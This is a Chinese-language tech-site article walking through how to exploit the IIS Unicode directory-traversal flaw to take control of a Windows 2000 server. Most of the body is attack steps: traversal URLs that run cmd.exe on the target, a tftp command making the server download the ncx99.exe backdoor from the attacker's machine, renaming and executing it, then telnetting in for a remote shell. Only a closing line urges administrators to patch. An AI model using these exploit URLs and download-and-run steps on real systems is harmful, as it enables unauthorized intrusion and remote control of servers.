科技行者

行者学院 转型私董会 科技行者专题报道 网红大战科技行者

知识库

知识库 安全导航

至顶网网络频道利用Unicode漏洞控制Windows2000

利用Unicode漏洞控制Windows2000

  • 扫一扫
    分享文章到微信

  • 扫一扫
    关注官方公众号
    至顶头条

unicode如今成为热门的漏洞之一,下面catsun将给大家详细讲解利用unicode漏洞进入Windows 2000的详细过程。
  • 评论
  • 分享微博
  • 分享邮件

  unicode如今成为热门的漏洞之一,下面catsun将给大家详细讲解利用unicode漏洞进入Windows 2000的详细过程。由于关于Unicode的文章很多,就不讲述如何去寻找一个有此漏洞的主机,也不讲如何利用此漏洞修改主页,主要讲一下如何控制这个Windows2000机器。

  开始:

  现在我们找到的一台漏洞主机:202.100.100.1(假设)

  当然下面的调用大家再熟悉不过:

  http://***.***.***.***/scripts/..%c1%1c../winnt/

  system32/cmd.exe?/c+dir+c:\

  目录被列出,到这,大家都知道,可以修改主页,删除或在服务器上移动一些文件了。

  但此时您的权限很低,怎样得到更高得权限呢?方法也有不少,但成功率并不很高。经过比较,让服务器下载木马的方法较好:

  首先,下载unicode工具;解压后有如下文件:

  tftpd32.exe(一个FTP服务器)

  ncx99.exe(telnet到99端口)

  这两个大家都熟悉吧,其他的不用管。

  运行tftpd32.exe

  这是一个小巧的FTP服务器,在运行它之前,建议关闭其他FTP服务器,保持tftpd运行,这时你的机器已经是一个FTP服务器了。回到你的浏览器,在地址栏里填入:

  http://***.***.***.***/scripts/..%c1%1c../winnt/system32/

  cmd.exe?/c+tftp -i ???.???.???.??? GET ncx99.exe c:\\inetpub\\scripts\\sr.exe

  .???.???.???为你自己的IP,

  注意:c:\\inetpub\\scripts\\sr.exe 其中c:\\inetpub\\scripts\\为主机服务器目录,要看主机的具体情况而定,sr.exe为被改名的ncx99.exe(自己选名字吧)。

  然后等待...大概3分钟...IE浏览器左下角显示完成,红色漏斗消失,这时ncx99.exe已经上传到主机c:\inetpub\scripts\目录了,您可以自己检查一下。

  再使用如下调用来执行ncx99.exe(sr.exe)

  http://***.***.***.***/scripts/..%c1%1c../winnt/system32/

  cmd.exe?/c+c:\inetpub\scripts\sr.exe

  然后您就可以 telnet ***.***.***.***

  以后就看你怎么使用这台机器了。当然您上传什么控制文件也由您自己决定,这只是一个方法。

  注意:

  视窗安全 想用简单的描述告诉大家,IISunicode漏洞的危害,请国内的Administrators们尽快补好.

    • 评论
    • 分享微博
    • 分享邮件
    邮件订阅

    如果您非常迫切的想了解IT领域最新产品与技术信息,那么订阅至顶网技术邮件将是您的最佳途径之一。

    重磅专题
    往期文章
    最新文章